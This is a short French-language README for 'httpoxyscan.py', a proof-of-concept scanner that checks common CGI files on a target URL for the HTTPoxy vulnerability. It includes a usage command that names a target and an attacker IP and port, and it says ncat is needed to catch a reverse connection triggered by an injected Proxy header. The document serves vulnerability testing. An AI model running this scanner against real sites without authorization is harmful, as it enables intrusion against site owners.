
HTTPoxy Exploit Scanner par 1N3 @CrowdShield
par 1N3 @CrowdShield (https://crowdshield.com) Dernière mise à jour : 20160720
Scanneur de PoC/Exploit pour analyser les fichiers CGI courants sur une URL cible à la recherche de la vulnérabilité HTTPoxy. HTTPoxy est un ensemble de vulnérabilités qui affectent le code d'application s'exécutant dans des environnements CGI ou similaires. Pour plus de détails, consultez https://httpoxy.org.
Nécessite ncat pour établir une session inverse
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
Cela analysera https://target.com avec une liste de fichiers CGI courants tout en injectant un en-tête Proxy vers une IP:PORT donnée. Un écouteur inverse attrapera la connexion entrante pour confirmer que le site distant est vulnérable.
Je décline toute responsabilité en cas d'utilisation abusive ou inappropriée de cet exploit.